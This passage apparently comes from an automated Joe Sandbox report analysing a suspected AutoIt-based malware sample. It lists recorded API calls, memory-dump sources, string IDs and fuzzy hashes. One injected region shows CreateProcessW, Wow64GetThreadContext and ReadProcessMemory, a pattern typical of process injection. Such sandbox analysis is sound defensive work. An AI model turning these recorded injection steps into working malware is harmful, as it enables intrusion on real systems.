                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                          • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: QueryValue$CloseOpen
                                          • String ID: Include$Software\AutoIt v3\AutoIt
                                          • API String ID: 1586453840-614718249
                                          • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                          • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                          • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                          • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2154 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                          APIs
                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                          • ShowWindow.USER32(?,00000000), ref: 004105E4
                                          • ShowWindow.USER32(?,00000000), ref: 004105EE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Window$CreateShow
                                          • String ID: AutoIt v3$edit
                                          • API String ID: 1584632944-3779509399
                                          • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                          • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                          • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                          • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                          APIs
                                            • Part of subcall function 03E822E8: Sleep.KERNELBASE(000001F4), ref: 03E822F9
                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03E82519
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1729394429.0000000003E80000.00000040.00000020.00020000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3e80000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CreateFileSleep
                                          • String ID: TY10VCQFO35L44S3ALY9T49FC
                                          • API String ID: 2694422964-991001646
                                          • Opcode ID: d2a249c313905fd895839d1e938a599fbad057ed0169985e0c7670a7098c9509
                                          • Instruction ID: 1fd18f3822f1daaaa225ebf2acb45d37d9258932eb3fa8b4ef2053b05ee3117a
                                          • Opcode Fuzzy Hash: d2a249c313905fd895839d1e938a599fbad057ed0169985e0c7670a7098c9509
                                          • Instruction Fuzzy Hash: 5B51A230D05289DEEF12D7F4C958BEEBBB8AF15304F044599E6087B2C1D6B91B48CB66
                                          APIs
                                          • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                          • _wcsncpy.LIBCMT ref: 00401C41
                                          • _wcscpy.LIBCMT ref: 00401C5D
                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                          • String ID: Line:
                                          • API String ID: 1874344091-1585850449
                                          • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                          • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                          • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                          • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                          APIs
                                          • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                          • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                          • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                          • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Close$OpenQueryValue
                                          • String ID: Control Panel\Mouse
                                          • API String ID: 1607946009-824357125
                                          • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                          • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                          • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                          • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                          APIs
                                          • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                          • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                          • _wcsncpy.LIBCMT ref: 004102ED
                                          • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                          • _wcsncpy.LIBCMT ref: 00410340
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                          • String ID:
                                          • API String ID: 3170942423-0
                                          • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                          • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                          • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                          • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                          APIs
                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 03E81B15
                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03E81B39
                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03E81B5B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1729394429.0000000003E80000.00000040.00000020.00020000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3e80000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                          • String ID:
                                          • API String ID: 2438371351-0
                                          • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                          • Instruction ID: b31aacd13b701623aab422b358fe7b72f90e72b45ea75c9c6b4abce2992ca7d1
                                          • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                          • Instruction Fuzzy Hash: 71620934E14218DBEB24DFA4C840BEEB376EF58704F1091A9D10DEB290E7769E81CB59
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: Error:
                                          • API String ID: 4104443479-232661952
                                          • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                          • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                          • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                          • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                          APIs
                                          • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                            • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                            • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                            • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                            • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                            • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                            • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                          • String ID: X$pWH
                                          • API String ID: 85490731-941433119
                                          • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                          • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                          • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                          • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                          APIs
                                          • _wcslen.LIBCMT ref: 00401B11
                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                          • _memmove.LIBCMT ref: 00401B57
                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                          • String ID: @EXITCODE
                                          • API String ID: 2734553683-3436989551
                                          • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                          • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                          • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                          • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                          • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                          • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                          • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                          • String ID:
                                          • API String ID: 1794320848-0
                                          • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                          • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                          • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                          • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                          • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Process$CurrentTerminate
                                          • String ID:
                                          • API String ID: 2429186680-0
                                          • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                          • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                          • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                          • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                          APIs
                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_
                                          • String ID:
                                          • API String ID: 1144537725-0
                                          • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                          • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                          • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                          • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                          APIs
                                          • _malloc.LIBCMT ref: 0043214B
                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                          • _malloc.LIBCMT ref: 0043215D
                                          • _malloc.LIBCMT ref: 0043216F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _malloc$AllocateHeap
                                          • String ID:
                                          • API String ID: 680241177-0
                                          • Opcode ID: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                          • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                          • Opcode Fuzzy Hash: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                          • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                          APIs
                                          • TranslateMessage.USER32(?), ref: 00409556
                                          • DispatchMessageW.USER32(?), ref: 00409561
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Message$DispatchPeekTranslate
                                          • String ID:
                                          • API String ID: 4217535847-0
                                          • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                          • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                          • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                          • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                          APIs
                                          • _free.LIBCMT ref: 0043210A
                                            • Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
                                            • Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
                                          • _free.LIBCMT ref: 0043211D
                                          • _free.LIBCMT ref: 00432130
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
